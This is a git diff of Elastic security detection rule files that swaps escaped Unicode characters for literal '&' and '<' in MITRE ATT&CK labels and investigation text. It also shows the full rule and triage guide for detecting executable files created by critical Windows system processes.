+++ b/packages/security_detection_engine/kibana/security_rule/e88d1fe9-b2f4-48d4-bace-a026dc745d4b_3.json
@@ -72,7 +72,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/e88d1fe9-b2f4-48d4-bace-a026dc745d4b_4.json b/packages/security_detection_engine/kibana/security_rule/e88d1fe9-b2f4-48d4-bace-a026dc745d4b_4.json
index 427de916f4d..72f249c0b35 100644
--- a/packages/security_detection_engine/kibana/security_rule/e88d1fe9-b2f4-48d4-bace-a026dc745d4b_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/e88d1fe9-b2f4-48d4-bace-a026dc745d4b_4.json
@@ -73,7 +73,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/e9001ee6-2d00-4d2f-849e-b8b1fb05234c_1.json b/packages/security_detection_engine/kibana/security_rule/e9001ee6-2d00-4d2f-849e-b8b1fb05234c_1.json
index 772be774c50..c19dafb4538 100644
--- a/packages/security_detection_engine/kibana/security_rule/e9001ee6-2d00-4d2f-849e-b8b1fb05234c_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/e9001ee6-2d00-4d2f-849e-b8b1fb05234c_1.json
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/e9001ee6-2d00-4d2f-849e-b8b1fb05234c_103.json b/packages/security_detection_engine/kibana/security_rule/e9001ee6-2d00-4d2f-849e-b8b1fb05234c_103.json
index 9f78bc34c95..9ed7ba78804 100644
--- a/packages/security_detection_engine/kibana/security_rule/e9001ee6-2d00-4d2f-849e-b8b1fb05234c_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/e9001ee6-2d00-4d2f-849e-b8b1fb05234c_103.json
@@ -76,7 +76,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/e9001ee6-2d00-4d2f-849e-b8b1fb05234c_104.json b/packages/security_detection_engine/kibana/security_rule/e9001ee6-2d00-4d2f-849e-b8b1fb05234c_104.json
index 6f271c9a1cc..75b6b32263f 100644
--- a/packages/security_detection_engine/kibana/security_rule/e9001ee6-2d00-4d2f-849e-b8b1fb05234c_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/e9001ee6-2d00-4d2f-849e-b8b1fb05234c_104.json
@@ -76,7 +76,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/e9001ee6-2d00-4d2f-849e-b8b1fb05234c_2.json b/packages/security_detection_engine/kibana/security_rule/e9001ee6-2d00-4d2f-849e-b8b1fb05234c_2.json
index 0385dc992ef..0eacd40cd1e 100644
--- a/packages/security_detection_engine/kibana/security_rule/e9001ee6-2d00-4d2f-849e-b8b1fb05234c_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/e9001ee6-2d00-4d2f-849e-b8b1fb05234c_2.json
@@ -73,7 +73,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/e90ee3af-45fc-432e-a850-4a58cf14a457_102.json b/packages/security_detection_engine/kibana/security_rule/e90ee3af-45fc-432e-a850-4a58cf14a457_102.json
index 0a4411204f4..23eae72b6e8 100644
--- a/packages/security_detection_engine/kibana/security_rule/e90ee3af-45fc-432e-a850-4a58cf14a457_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/e90ee3af-45fc-432e-a850-4a58cf14a457_102.json
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -71,7 +71,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -86,7 +86,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/e90ee3af-45fc-432e-a850-4a58cf14a457_103.json b/packages/security_detection_engine/kibana/security_rule/e90ee3af-45fc-432e-a850-4a58cf14a457_103.json
index ffad6614c58..11d34baa860 100644
--- a/packages/security_detection_engine/kibana/security_rule/e90ee3af-45fc-432e-a850-4a58cf14a457_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/e90ee3af-45fc-432e-a850-4a58cf14a457_103.json
@@ -54,7 +54,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -69,7 +69,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -84,7 +84,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/e90ee3af-45fc-432e-a850-4a58cf14a457_104.json b/packages/security_detection_engine/kibana/security_rule/e90ee3af-45fc-432e-a850-4a58cf14a457_104.json
index f1addcea68f..692e7a267bf 100644
--- a/packages/security_detection_engine/kibana/security_rule/e90ee3af-45fc-432e-a850-4a58cf14a457_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/e90ee3af-45fc-432e-a850-4a58cf14a457_104.json
@@ -54,7 +54,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -69,7 +69,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -84,7 +84,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/e90ee3af-45fc-432e-a850-4a58cf14a457_105.json b/packages/security_detection_engine/kibana/security_rule/e90ee3af-45fc-432e-a850-4a58cf14a457_105.json
index 1c453f01dd9..da55f2035f8 100644
--- a/packages/security_detection_engine/kibana/security_rule/e90ee3af-45fc-432e-a850-4a58cf14a457_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/e90ee3af-45fc-432e-a850-4a58cf14a457_105.json
@@ -53,7 +53,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -68,7 +68,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -83,7 +83,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/e90ee3af-45fc-432e-a850-4a58cf14a457_106.json b/packages/security_detection_engine/kibana/security_rule/e90ee3af-45fc-432e-a850-4a58cf14a457_106.json
index 0c939251df3..347a0df9f16 100644
--- a/packages/security_detection_engine/kibana/security_rule/e90ee3af-45fc-432e-a850-4a58cf14a457_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/e90ee3af-45fc-432e-a850-4a58cf14a457_106.json
@@ -53,7 +53,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -68,7 +68,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -83,7 +83,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/e90ee3af-45fc-432e-a850-4a58cf14a457_207.json b/packages/security_detection_engine/kibana/security_rule/e90ee3af-45fc-432e-a850-4a58cf14a457_207.json
index c91c51223bb..9e6d6556b66 100644
--- a/packages/security_detection_engine/kibana/security_rule/e90ee3af-45fc-432e-a850-4a58cf14a457_207.json
+++ b/packages/security_detection_engine/kibana/security_rule/e90ee3af-45fc-432e-a850-4a58cf14a457_207.json
@@ -53,7 +53,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -68,7 +68,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -83,7 +83,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/e919611d-6b6f-493b-8314-7ed6ac2e413b_102.json b/packages/security_detection_engine/kibana/security_rule/e919611d-6b6f-493b-8314-7ed6ac2e413b_102.json
index 2a0fe1c063a..71ea1033cc2 100644
--- a/packages/security_detection_engine/kibana/security_rule/e919611d-6b6f-493b-8314-7ed6ac2e413b_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/e919611d-6b6f-493b-8314-7ed6ac2e413b_102.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0010",
 "name": "Exfiltration",
@@ -81,7 +81,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
diff --git a/packages/security_detection_engine/kibana/security_rule/e919611d-6b6f-493b-8314-7ed6ac2e413b_103.json b/packages/security_detection_engine/kibana/security_rule/e919611d-6b6f-493b-8314-7ed6ac2e413b_103.json
index 8611ee7e5dc..ee7853add46 100644
--- a/packages/security_detection_engine/kibana/security_rule/e919611d-6b6f-493b-8314-7ed6ac2e413b_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/e919611d-6b6f-493b-8314-7ed6ac2e413b_103.json
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0010",
 "name": "Exfiltration",
@@ -80,7 +80,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
diff --git a/packages/security_detection_engine/kibana/security_rule/e919611d-6b6f-493b-8314-7ed6ac2e413b_104.json b/packages/security_detection_engine/kibana/security_rule/e919611d-6b6f-493b-8314-7ed6ac2e413b_104.json
index bdba96e4ade..4a187c922c5 100644
--- a/packages/security_detection_engine/kibana/security_rule/e919611d-6b6f-493b-8314-7ed6ac2e413b_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/e919611d-6b6f-493b-8314-7ed6ac2e413b_104.json
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0010",
 "name": "Exfiltration",
@@ -80,7 +80,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
diff --git a/packages/security_detection_engine/kibana/security_rule/e919611d-6b6f-493b-8314-7ed6ac2e413b_205.json b/packages/security_detection_engine/kibana/security_rule/e919611d-6b6f-493b-8314-7ed6ac2e413b_205.json
index 58d16cd62da..d00a5057956 100644
--- a/packages/security_detection_engine/kibana/security_rule/e919611d-6b6f-493b-8314-7ed6ac2e413b_205.json
+++ b/packages/security_detection_engine/kibana/security_rule/e919611d-6b6f-493b-8314-7ed6ac2e413b_205.json
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0010",
 "name": "Exfiltration",
@@ -80,7 +80,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
diff --git a/packages/security_detection_engine/kibana/security_rule/e92c99b6-c547-4bb6-b244-2f27394bc849_1.json b/packages/security_detection_engine/kibana/security_rule/e92c99b6-c547-4bb6-b244-2f27394bc849_1.json
index c0b04583f6f..c690b7011a3 100644
--- a/packages/security_detection_engine/kibana/security_rule/e92c99b6-c547-4bb6-b244-2f27394bc849_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/e92c99b6-c547-4bb6-b244-2f27394bc849_1.json
@@ -33,7 +33,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0010",
 "name": "Exfiltration",
diff --git a/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_104.json b/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_104.json
index 0f0dd9f6e20..639aed4f4b8 100644
--- a/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_104.json
@@ -14,7 +14,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Unusual Executable File Creation by a System Critical Process",
- "note": "## Triage and analysis\n\n### Investigating Unusual Executable File Creation by a System Critical Process\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is file operations.\n\nThis rule looks for the creation of executable files done by system-critical processes. This can indicate the exploitation of a vulnerability or a malicious process masquerading as a system-critical process.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
+ "note": "## Triage and analysis\n\n### Investigating Unusual Executable File Creation by a System Critical Process\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is file operations.\n\nThis rule looks for the creation of executable files done by system-critical processes. This can indicate the exploitation of a vulnerability or a malicious process masquerading as a system-critical process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.extension : (\"exe\", \"dll\") and\n process.name : (\"smss.exe\",\n \"autochk.exe\",\n \"csrss.exe\",\n \"wininit.exe\",\n \"services.exe\",\n \"lsass.exe\",\n \"winlogon.exe\",\n \"userinit.exe\",\n \"LogonUI.exe\")\n",
 "related_integrations": [
 {
@@ -50,7 +50,7 @@
 ],
 "risk_score": 73,
 "rule_id": "e94262f2-c1e9-4d3f-a907-aeab16712e1a",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_105.json b/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_105.json
index 264be565ca6..b22677b8352 100644
--- a/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_105.json
@@ -14,7 +14,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Unusual Executable File Creation by a System Critical Process",
- "note": "## Triage and analysis\n\n### Investigating Unusual Executable File Creation by a System Critical Process\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is file operations.\n\nThis rule looks for the creation of executable files done by system-critical processes. This can indicate the exploitation of a vulnerability or a malicious process masquerading as a system-critical process.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
+ "note": "## Triage and analysis\n\n### Investigating Unusual Executable File Creation by a System Critical Process\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is file operations.\n\nThis rule looks for the creation of executable files done by system-critical processes. This can indicate the exploitation of a vulnerability or a malicious process masquerading as a system-critical process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.extension : (\"exe\", \"dll\") and\n process.name : (\"smss.exe\",\n \"autochk.exe\",\n \"csrss.exe\",\n \"wininit.exe\",\n \"services.exe\",\n \"lsass.exe\",\n \"winlogon.exe\",\n \"userinit.exe\",\n \"LogonUI.exe\")\n",
 "related_integrations": [
 {
@@ -50,7 +50,7 @@
 ],
 "risk_score": 73,
 "rule_id": "e94262f2-c1e9-4d3f-a907-aeab16712e1a",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
